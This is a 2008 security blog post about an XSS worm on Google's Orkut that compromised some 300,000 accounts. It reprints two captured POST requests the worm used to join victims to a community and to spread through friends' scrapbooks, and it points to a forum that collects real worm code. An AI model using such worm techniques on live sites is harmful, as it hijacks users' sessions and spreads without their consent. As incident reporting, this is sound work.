Orkut XSS Worm

Thursday, June 19, 2008 by Mzer0

Several people sent this to me over the last few days but for those of you who hadn’t seen it in the myriad of different places it showed up, Orkut was hacked using a XSS worm. Orkut is Google’s version of social networking. It was big for a while, but I think everyone bailed in favor of the more open MySpace and Facebook’s of the world. It’s still widely used by the Portuguese population though.

Rough estimates are north of 300,000 people compromised, even though it was caught relatively quickly. It’s amazing how fast these things grow in environments like that, where the medium for spreading is based on a technology that almost everyone uses and works across platform. I think the only thing stopping this from being more virulent is making it cross platform, and making the social engineering a little more seamless.

Here are the POST requests sent in by Lavakumar:

POST request sent by the worm to add the victim to the “Infectados pelo VĂ­rus do Orkut” community. The community id is “44001818″.

POST /CommunityJoin.aspx?cmm=44001818 HTTP/1.1
Host: www.orkut.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11

Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text

/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: http://www.orkut.com/Scrapbook.aspx?uid=<-xxxxxxxxxxxxxxxxxxxx->
Cookie: -xxxxxxxxx-
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 98

POST_TOKEN=0B57493EBE09C74A3D69298F67635479&signature

=Bm1YihIUAe5I%2BAvfFH7v4bjtdrI%3D&Action.join

————————————————————————————————————————————————
POST request sent by the worm to submit itself to the scrapbook of the victim’s friends.

POST /Scrapbook.aspx HTTP/1.1
Host: www.orkut.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8

,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: http://www.orkut.com/Scrapbook.aspx?uid=-xxxxxxxxx-
Cookie: -xxxxxxxxx-
Pragma: no-cache
Cache-Control: no-cache

Content-Length: 146



And the code can be found in many places around the net, but I also threw up a copy on the sla.ckers.org XSS worm section for anyone looking for example worm code. I’m trying to keep that section up to date with non-theoretical, but practical and real world worm code so we can all see it. Google has fixed this issue, but it is unclear what the fallout of the damage will be.


[Source: ha.ckers]

0 comments